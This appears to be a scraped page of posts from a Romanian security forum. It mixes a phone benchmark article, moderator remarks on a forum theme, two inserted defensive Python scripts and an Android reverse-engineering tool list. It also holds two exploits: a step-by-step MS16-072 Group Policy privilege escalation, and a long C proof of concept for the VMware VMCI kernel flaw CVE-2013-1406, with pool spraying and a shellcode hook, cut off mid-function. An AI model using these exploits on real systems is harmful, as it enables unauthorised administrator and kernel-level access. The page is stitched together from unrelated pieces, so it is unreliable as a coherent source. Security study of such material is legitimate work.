These results were recorded even though the Note 7 has superior hardware. The iPhone 6S uses a processor developed two years ago and has 2 GB of RAM, while the Note 7 has a processor launched 6 months ago and 4 GB of RAM.

The logical conclusion is that the software makes the difference. An operating system optimized specifically for one set of components will be clearly superior to one scaled to run on hundreds of possible configurations. Apple has complete control over the iPhone and can optimize the iOS operating system to run as efficiently as possible. As a result, the hardware requirements are lower when the software is properly optimized.

On the other side there is Android, which, like Windows on PCs, has to run on a very large number of devices. The task of optimizing the software should fall to the manufacturer. The manufacturer, however, is busy launching new device after new device at a brisk pace and pays no attention to this aspect, trying to compensate with hardware instead. Worse, the manufacturer adds extra load to the operating system itself by pre-installing apps that are more or less useless to users.

This is how you end up with the major discrepancy in which a phone with clearly superior specs runs much worse than one with weaker components but well-optimized software. Android fans will only get to enjoy something like that once Google develops its own smartphone and optimizes the operating system specifically for it.

The Galaxy Note 7 is available in Romania at a price of 3,900 lei. The corresponding iPhone 6S model, with the same 64 GB of storage, costs approximately 3,800 lei.

Source: http://www.digi24.ro/Stiri/Digi24/Sci-tech/Gadget/cel+mai+rapid+telefon
  16. Nytro

    Theme

    It is a huge step forward from vBulletin to IPBoard. I don't even know how many lines of code I modified in that platform (vB)...

    1. It is the largest security forum, not a web design one - I understand if trivial security problems show up, not if a theme looks ugly
    2. You are not the only one; there are many people who "grew up" on the forum and gained something from it (a job, for example), but then forgot about it (you know the term - leeching)
    3. The posts from January of this year were lost, that's all. And I followed the forum in that period; believe me, not much was lost
    4. There are many with an interest in learning, few capable (time-wise) of helping them
    5. The moderators, like me, have a family and a job and no longer have time for the forum
    6. The RST user profile is not that one; it's just that those people stand out more. The forum is not meant for programmers but for IT security enthusiasts, who must have in their blood something of what you describe. Those who are programmers come here and pick up non-programmer traits such as "think outside the box"

    Pentesters (like me) waste their time around here. But there are too few who have the time and dedication needed to post quality material.

    You didn't lie, I understand you, I agree with you (not entirely). There is a possibility this forum will disappear, I don't deny that, but as long as we can help the Romanian community grow on the right path, the forum will stay standing.

    I think of you as I think of the others: you probably have the technical and psychological qualities needed to help others, but it seems you don't. Why? Because we Romanians only like to complain and want to see others doing something. If you want a change, start with yourself.

    // Nytro
  17. "In the meantime you can submit a paper at the Call for Papers. Maybe, you'll be the next cyber security rock star. :-)"
  18. Nytro

    Theme

    PS: When you post images, try to use HTTPS instead of HTTP as well...
  19. Nytro

    Theme

    There are still problems:
    1. Related to the theme (I'll keep working on it)
    2. Related to images posted on the forum (I'll check)
    3. Related to profile pictures/avatars - if it doesn't work, upload again and it should be OK.

    Fuck InvisionPower shitservices.
  20. Nytro

    Theme

    I'm working on it; there will be problems and it will look ugly in the meantime.
  21. Nytro

    Theme

    Hi,

    As you can see, some problems related to the theme have appeared. Fuck the IP Board people.
  22. Microsoft Windows Group Policy - Privilege Escalation (MS16-072)

# Exploit Title: Group Policy Elevation of Privilege Vulnerability
# Date: 08-08-2016
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 Professional (x32/x64)
# CVE : CVE-2016-3223
# Category: Privilege Escalation

SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials)

SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies.

1) Prerequisites:
- Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local)
- Domain User Credentials are known with no Administrative rights.
- Computer has to be connected on a network.
- Fake Domain Controller

2) Reproduce:
STEP 1: Determine domain of the target computer (e.g. domain.local)
STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to logging in. The username can be extracted from the login screen (E.g USER1)
STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
STEP 4: Create User with similar name and password as the target computer. (E.g. domain\USER1:password123!).
STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials).
STEP 6: Establish network connection between the target system and the newly created Domain Controller.
STEP 7: Create a Group Policy called "Create Local Admin"
STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators".
STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force"
STEP 10: User Policy update will complete successfully.
STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators"
STEP 12: "TestAdmin" user will be member of the Administrators group.

3) Impact: A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller

4) Solution: Install the latest patches from 14-06-2016 using Windows Update.

5) References:
https://technet.microsoft.com/en-us/library/security/ms16-072.aspx
https://support.microsoft.com/en-us/kb/3163622

6) Credits: Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com)

Source: https://www.exploit-db.com/exploits/40219/
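An added example from the defender's side, not part of the advisory above: a Python 3 script that parses the output of "net localgroup Administrators" (the command the advisory uses in STEP 11) and of "wmic qfe get HotFixID", and reports local administrators outside an allowlist as well as whether KB3163622 from the advisory's references is present. Both command outputs below are constructed samples, and EXPECTED_ADMINS is a placeholder allowlist a site would fill in from its own build standard.

```python
from typing import List

# Constructed sample of `net localgroup Administrators` output (not from a real host).
SAMPLE_NET_LOCALGROUP = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DOMAIN\\Domain Admins
TestAdmin
The command completed successfully.
"""

# Constructed sample of `wmic qfe get HotFixID` output.
SAMPLE_WMIC_QFE = """\
HotFixID
KB3161608
KB3163622
"""

# Placeholder allowlist: the members expected in the local Administrators group.
EXPECTED_ADMINS = {'Administrator', 'DOMAIN\\Domain Admins'}

# The update referenced in the advisory's Solution section.
MS16_072_KB = 'KB3163622'


def parse_local_admins(text: str) -> List[str]:
    """Return the member names listed between the dashed separator and the trailer."""
    members = []
    in_members = False
    for line in text.splitlines():
        line = line.rstrip()
        if line.startswith('----'):
            in_members = True  # member list starts after the separator
            continue
        if not in_members or not line:
            continue
        if line.startswith('The command completed'):
            break  # end of the member list
        members.append(line)
    return members


def unexpected_admins(text: str, expected=EXPECTED_ADMINS) -> List[str]:
    """Members of the local Administrators group that are not on the allowlist."""
    return [m for m in parse_local_admins(text) if m not in expected]


def hotfix_installed(qfe_text: str, kb: str = MS16_072_KB) -> bool:
    """True when the given KB appears in the hotfix list."""
    ids = {line.strip() for line in qfe_text.splitlines()}
    return kb in ids


if __name__ == '__main__':
    for member in unexpected_admins(SAMPLE_NET_LOCALGROUP):
        print('[!] unexpected local administrator: %s' % member)
    print('[*] %s installed: %s' % (MS16_072_KB, hotfix_installed(SAMPLE_WMIC_QFE)))
```

Feeding the script real output (for example via subprocess on the host being audited) turns it into a small compliance check: an unexpected member plus a missing KB3163622 is the combination that the procedure in the advisory would produce.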
  23. 25 Awesome Android Reverse Engineering Tools

A curated list of awesome Android reverse engineering tools. Be sure to check out our list of IDA Pro alternatives and best deobfuscation tools, too.

1. SMALI/BAKSMALI
smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)

2. ANDBUG
AndBug is a debugger targeting the Android platform's Dalvik virtual machine intended for reverse engineers and developers. It uses the same interfaces as Android's Eclipse debugging plugin, the Java Debug Wire Protocol (JDWP) and Dalvik Debug Monitor (DDM) to permit users to hook Dalvik methods, examine process state, and even perform changes. Unlike Google's own Android Software Development Kit debugging tools, AndBug does not require or expect source code. It does, however, require that you have some level of comfort with Python, as it uses a concept of scripted breakpoints, called "hooks", for most nontrivial tasks.

3. ANDROGUARD
Androguard is a full python tool to play with Android files.
- DEX, ODEX
- APK
- Android's binary xml
- Android resources
- Disassemble DEX/ODEX bytecodes
- Decompiler for DEX/ODEX files

4. APKTOOL
A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes it possible to debug smali code step by step. It also makes working with an app easier because of the project-like file structure and automation of some repetitive tasks like building the apk, etc.
Features:
- Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png and XMLs)
- Rebuilding decoded resources back to binary APK/JAR
- Organizing and handling APKs that depend on framework resources
- Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali)
- Helping with repetitive tasks

5. ANDROID FRAMEWORK FOR EXPLOITATION
Android Framework for Exploitation is a framework for exploiting android based devices and applications.

6. BYPASS SIGNATURE AND PERMISSION CHECKS FOR IPCS
This tool leverages Cydia Substrate to bypass signature and permission checks for IPCs.

7. ANDROID OPENDEBUG
This tool leverages Cydia Substrate to make all applications running on the device debuggable; once installed any application will let a debugger attach to them.

8. DARE
Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techniques developed for traditional Java applications.

9. DEX2JAR
Tools to work with android .dex and java .class files.

10. ENJARIFY
Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.

11. DEDEXER
Dedexer is a disassembler tool for DEX files. DEX is a format introduced by the creators of the Android platform. The format and the associated opcode set is in distant relationship with the Java class file format and Java bytecodes. Dedexer is able to read the DEX format and turn it into an "assembly-like format". This format was largely influenced by the Jasmin syntax but contains Dalvik opcodes. For this reason, Jasmin is not able to compile the generated files.

12. FINO
An Android Dynamic Analysis Tool.

13. INDROID
The aim of the project is to demonstrate that a simple debugging functionality on *nix systems a.k.a ptrace() can be abused by malware to inject malicious code in remote processes. Indroid provides a CreateRemoteThread() equivalent for ARM based *nix devices. If you want to get a deeper insight into the working of the framework you may:
- Watch the Defcon 19 video on Jugaad – http://www.youtube.com/watch?v=vju6tq1lp0k
- Read the paper – http://www.slideshare.net/null0x00/project-jugaad

14. INTENTSNIFFER
Intent Sniffer is a tool that can be used on any device using the Google Android operating system (OS). On the Android OS, an Intent is a description of an action to be performed, such as startService to start a service. The Intent Sniffer tool performs monitoring of runtime routed broadcast Intents. It does not see explicit broadcast Intents, but defaults to (mostly) unprivileged broadcasts. There is an option to see recent tasks' Intents (GET_TASKS), as Activities' intents are visible when started. The tool can also dynamically update Actions & Categories.

15. INTROSPY
Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues.

16. JAD
Jad is a Java decompiler.

17. JD-GUI
JD-GUI is a standalone graphical utility that displays Java source code of ".class" files. You can browse the reconstructed source code with JD-GUI for instant access to methods and fields.

18. CFR
CFR will decompile modern Java features – Java 8 lambdas (pre and post Java beta 103 changes), Java 7 String switches etc, but is written entirely in Java 6.

19. KRAKATAU
Krakatau currently contains three tools – a decompiler and disassembler for Java classfiles and an assembler to create classfiles.

20. PROCYON
While still incomplete, tests seem to indicate that the Procyon decompiler can generally hold its own against the other leading Java decompilers out there.

21. FERNFLOWER
Fernflower is the first actually working analytical decompiler for Java.

22. REDEXER
Redexer is a reengineering tool that manipulates Android app binaries. This tool is able to parse a DEX file into an in-memory data structure; to infer with which parameters the app uses certain permissions (we name this feature RefineDroid); to modify and unparse that data structure to produce an output DEX file (we name these features Dr. Android, which stands for Dalvik Rewriting for Android).

23. SIMPLIFY ANDROID DEOBFUSCATOR
Simplify virtually executes an app to understand its behavior and then tries to optimize the code so that it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what specific type of obfuscation is used.

24. BYTECODE VIEWER
Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more. It's written completely in Java, and it's open sourced. It's currently being maintained and developed by Konloch. There is also a plugin system that will allow you to interact with the loaded classfiles; for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of. You can either use one of the pre-written plugins, or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV; this allows the user to handle it completely using ASM.

25. RADARE2
r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files. The Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for reversing apks, analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, etc.

Source: https://hackerlists.com/android-reverse-engineering-tools/
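Most of the tools in the list above (smali/baksmali, dedexer, dex2jar, enjarify, redexer) start from the same place: the 0x70-byte dex header. As an added example, not code from the hackerlists.com page or from any of those projects, here is a Python 3 parser for that header that also verifies the two integrity fields a tampered or truncated classes.dex will fail on: the Adler-32 checksum over everything after the checksum field and the SHA-1 signature over everything after the signature field. The sample file is constructed in build_minimal_dex() (a header plus a one-entry map_list, no classes), so the script runs offline; TYPE_HEADER_ITEM's map type code 0x0000 and the field layout follow the published dex format.

```python
import hashlib
import struct
import zlib
from typing import Dict

DEX_HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678

# Header fields that follow the 8-byte magic, in file order.
HEADER_FIELDS = (
    'checksum', 'signature', 'file_size', 'header_size', 'endian_tag',
    'link_size', 'link_off', 'map_off',
    'string_ids_size', 'string_ids_off', 'type_ids_size', 'type_ids_off',
    'proto_ids_size', 'proto_ids_off', 'field_ids_size', 'field_ids_off',
    'method_ids_size', 'method_ids_off', 'class_defs_size', 'class_defs_off',
    'data_size', 'data_off',
)
# magic(8) checksum(4) signature(20) then twenty little-endian u4 fields = 0x70 bytes
HEADER_STRUCT = struct.Struct('<8sI20s' + 'I' * 20)


def parse_dex_header(data: bytes, verify: bool = True) -> Dict[str, object]:
    """Parse a dex header; with verify=True also check the checksum and signature."""
    if len(data) < DEX_HEADER_SIZE:
        raise ValueError('file shorter than a dex header')
    fields = HEADER_STRUCT.unpack_from(data, 0)
    hdr = dict(zip(('magic',) + HEADER_FIELDS, fields))
    if hdr['magic'][:4] != b'dex\n' or hdr['magic'][7:8] != b'\x00':
        raise ValueError('bad magic')
    hdr['version'] = hdr['magic'][4:7].decode('ascii')
    if hdr['endian_tag'] != ENDIAN_CONSTANT:
        raise ValueError('byte-swapped or corrupt endian_tag')
    if hdr['header_size'] != DEX_HEADER_SIZE:
        raise ValueError('unexpected header_size')
    if hdr['file_size'] != len(data):
        raise ValueError('file_size does not match actual length')
    if verify:
        # checksum covers everything after the checksum field (offset 12 onwards)
        if zlib.adler32(data[12:]) & 0xFFFFFFFF != hdr['checksum']:
            raise ValueError('adler32 checksum mismatch')
        # signature covers everything after the signature field (offset 32 onwards)
        if hashlib.sha1(data[32:]).digest() != hdr['signature']:
            raise ValueError('sha1 signature mismatch')
    return hdr


def is_valid_dex(data: bytes) -> bool:
    """Convenience wrapper: True only if the header parses and both integrity fields check out."""
    try:
        parse_dex_header(data)
        return True
    except ValueError:
        return False


def build_minimal_dex() -> bytes:
    """Constructed sample: a header plus a map_list with one item describing the header."""
    # map_list: u4 size, then map_item {u2 type, u2 unused, u4 size, u4 offset}
    map_list = struct.pack('<I', 1) + struct.pack('<HHII', 0x0000, 0, 1, 0)
    data_off = DEX_HEADER_SIZE
    file_size = DEX_HEADER_SIZE + len(map_list)
    counts_and_offsets = (
        0, 0,                                 # link_size, link_off
        data_off,                             # map_off
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,   # string/type/proto/field/method/class size+off
        len(map_list), data_off,              # data_size, data_off
    )
    body = (struct.pack('<III', file_size, DEX_HEADER_SIZE, ENDIAN_CONSTANT)
            + struct.pack('<' + 'I' * 17, *counts_and_offsets)
            + map_list)
    signature = hashlib.sha1(body).digest()           # everything after offset 32
    checksum = zlib.adler32(signature + body) & 0xFFFFFFFF  # everything after offset 12
    return b'dex\n035\x00' + struct.pack('<I', checksum) + signature + body


if __name__ == '__main__':
    sample = build_minimal_dex()
    hdr = parse_dex_header(sample)
    print('dex version %s, %d bytes, map_list at 0x%x' % (hdr['version'], hdr['file_size'], hdr['map_off']))
    damaged = bytearray(sample)
    damaged[-1] ^= 0xFF
    print('tampered copy valid:', is_valid_dex(bytes(damaged)))
```

Running it on a real classes.dex pulled from an APK is a one-line change (read the file and call parse_dex_header); a checksum or signature mismatch there usually means the file was patched after packaging, which is exactly what the repackaging tools above do, so a verification pass is a cheap first triage step before handing the file to a decompiler.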
  24. The presentations from Defcon 2016. Link: https://media.defcon.org/DEF CON 24/DEF CON 24 presentations/
  25. VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept

/*
    CVE-2013-1406 exploitation PoC
    by Artem Shishkin,
    Positive Research,
    Positive Technologies,
    02-2013
*/

void __stdcall FireShell(DWORD dwSomeParam)
{
    EscalatePrivileges(hProcessToElevate);

    // Equate the stack and quit the cycle
#ifndef _AMD64_
    __asm
    {
        pop ebx
        pop edi
        push 0xFFFFFFF8
        push 0xA010043
    }
#endif
}

HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0)
{
    HANDLE hResult = 0;
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr))
        {
            hResult = pHandleTable->Handles[i].HandleValue;
            break;
        }
    }

    return hResult;
}

PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
    PVOID pResult = 0;
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pResult = (HANDLE)pHandleTable->Handles[i].Object;
            break;
        }
    }

    return pResult;
}

void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pHandleTable->Handles[i].Object = NULL;
            pHandleTable->Handles[i].HandleValue = NULL;
            break;
        }
    }

    return;
}

void PoolSpray()
{
    // Init used native API function
    lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (NtQuerySystemInformation == NULL)
    {
        printf("Such a fail...\n");
        return;
    }

    // Determine object size
    // xp:
    //const DWORD_PTR dwSemaphoreSize = 0x38;
    // 7:
    //const DWORD_PTR dwSemaphoreSize = 0x48;
    DWORD_PTR dwSemaphoreSize = 0;
    if (LOBYTE(GetVersion()) == 5)
    {
        dwSemaphoreSize = 0x38;
    }
    else if (LOBYTE(GetVersion()) == 6)
    {
        dwSemaphoreSize = 0x48;
    }

    unsigned int cycleCount = 0;
    while (cycleCount < 50000)
    {
        HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
        if (hTemp == NULL)
        {
            break;
        }
        ++cycleCount;
    }
    printf("\t[+] Spawned lots of semaphores\n");

    printf("\t[.] Initing pool windows\n");
    Sleep(2000);

    DWORD dwNeeded = 4096;
    NTSTATUS status = 0xFFFFFFFF;
    PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);
    while (true)
    {
        status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL);
        if (status != STATUS_SUCCESS)
        {
            dwNeeded *= 2;
            VirtualFree(pBuf, 0, MEM_RELEASE);
            pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
        }
        else
        {
            break;
        }
    };

    HANDLE hHandlesToClose[0x30] = {0};
    DWORD dwCurPID = GetCurrentProcessId();
    PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;

    for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID)
        {
            DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
            DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
            DWORD_PTR dwWindowAddress = 0;
            bool bPoolWindowFound = false;

            UINT iObjectsNeeded = 0;
            // Needed window size is vmci packet pool chunk size (0x218) divided by
            // Semaphore pool chunk size (dwSemaphoreSize)
            iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);

            if (
                // Not on a page boundary
                ((dwTestObjAddr & 0xFFF) != 0) &&
                // Doesn't cross page boundary
                (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000))
               )
            {
                // Check previous object for being our semaphore
                DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
                if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL)
                {
                    continue;
                }

                for (unsigned int j = 1; j < iObjectsNeeded; j++)
                {
                    DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
                    HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);

                    //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
                    //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
                    //printf("\tLooked up handle = %08X\n", hLookedUp);

                    if (hLookedUp != NULL)
                    {
                        hHandlesToClose[j] = hLookedUp;

                        if (j == iObjectsNeeded - 1)
                        {
                            // Now test the following object
                            dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
                            if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL)
                            {
                                hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
                                bPoolWindowFound = true;
                                dwWindowAddress = dwTestObjAddr;

                                // Close handles to create a memory window
                                for (int k = 0; k < iObjectsNeeded; k++)
                                {
                                    if (hHandlesToClose[k] != NULL)
                                    {
                                        CloseHandle(hHandlesToClose[k]);
                                        CloseTableHandle(pHandleTable, hHandlesToClose[k]);
                                    }
                                }
                            }
                            else
                            {
                                memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                                break;
                            }
                        }
                    }
                    else
                    {
                        memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                        break;
                    }
                }

                if (bPoolWindowFound)
                {
                    printf("\t[+] Window found at %08X!\n", dwWindowAddress);
                }
            }
        }
    }

    VirtualFree(pBuf, 0, MEM_RELEASE);

    return;
}

void InitFakeBuf(PVOID pBuf, DWORD dwSize)
{
    if (pBuf != NULL)
    {
        RtlFillMemory(pBuf, dwSize, 0x11);
    }

    return;
}

void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
{
    /*
        Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043

        So, for every 0xXXXX0043 address we must suffice the following conditions:

        lea     edx, [eax+38h]
        lock xadd [edx], ecx
        cmp     ecx, 1

        Some sort of lock at [addr + 38] must be equal to 1. And

        call    dword ptr [eax+0ACh]

        The call site is located at [addr + 0xAC]

        Also fake the object to be dereferenced at [addr + 0x100]
    */
    if (pBuf != NULL)
    {
        for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep)
        {
            PDWORD pLock = (PDWORD)(iAddr + 0x38);
            PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
            PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);

            *pLock = 1;
            *pCallMeMayBe = (DWORD_PTR)FireShell;
            *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
        }
    }

    return;
}

void PenetrateVMCI()
{
    /*
        VMware Security Advisory

        Advisory ID: VMSA-2013-0002
        Synopsis:    VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability
        Issue date:  2013-02-07
        Updated on:  2013-02-07 (initial advisory)
        CVE numbers: CVE-2013-1406
    */

    DWORD dwPidToElevate = 0;
    HANDLE hSuspThread = NULL;
    bool bXP = (LOBYTE(GetVersion()) == 5);
    bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
    bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));

    if (!InitKernelFuncs())
    {
        printf("[-] Like I don't know where the shellcode functions are\n");
        return;
    }

    if (bXP)
    {
        printf("[?] Who do we want to elevate?\n");
        scanf_s("%d", &dwPidToElevate);

        hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
        if (hProcessToElevate == NULL)
        {
            printf("[-] This process doesn't want to be elevated\n");
            return;
        }
    }

    if (b7 || b8)
    {
        // We are unable to change an active process token on-the-fly,
        // so we create a custom shell suspended (Ionescu hack)
        STARTUPINFO si = {0};
        PROCESS_INFORMATION pi = {0};
        si.wShowWindow = TRUE;
        WCHAR cmdPath[MAX_PATH] = {0};

        GetSystemDirectory(cmdPath, MAX_PATH);
        wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");

        if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE)
        {
            hProcessToElevate = pi.hProcess;
            hSuspThread = pi.hThread;
        }
    }

    HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);

    if (hVMCIDevice != INVALID_HANDLE_VALUE)
    {
        UCHAR BadBuff[0x624] = {0};
        UCHAR retBuf[0x624] = {0};
        DWORD dwRet = 0;

        printf("[+] VMCI service found running\n");

        PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
        pVmReq->Header.RequestSize = 0xFFFFFFF0;

        PVOID pShellSprayBufStd = NULL;
        PVOID pShellSprayBufQtd = NULL;
        PVOID pShellSprayBufStd7 = NULL;
        PVOID pShellSprayBufQtd7 = NULL;
        PVOID pShellSprayBufChk8 = NULL;

        if ((b7) || (bXP) || (b8))
        {
            /*
                Significant bits of a PoolType of a chunk define the following regions:
                0x0A000000 - 0x0BFFFFFF - Standard chunk
                0x1A000000 - 0x1BFFFFFF - Quoted chunk
                0x0 - 0xFFFFFFFF - Free chunk - no idea

                Addon for Windows 7:
                Since PoolType flags have changed, and "In use flag" is now 0x2, define an additional region for Win7:
                0x04000000 - 0x06000000 - Standard chunk
                0x14000000 - 0x16000000 - Quoted chunk
            */
            pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

            // Each of the four regions must have been mapped (the original checked the same pointer four times)
            if ((pShellSprayBufStd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufStd7 == NULL) || (pShellSprayBufQtd7 == NULL))
            {
                printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
                CloseHandle(hVMCIDevice);
                return;
            }

            InitFakeBuf(pShellSprayBufStd, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd, 0x2000000);
            InitFakeBuf(pShellSprayBufStd7, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd7, 0x2000000);

            PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);

            if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE)
            {
                SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
            }

            PoolSpray();

            if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE)
            {
                printf("\t[!] If you don't see any BSOD, you're successful\n");
                if (b7 || b8)
                {
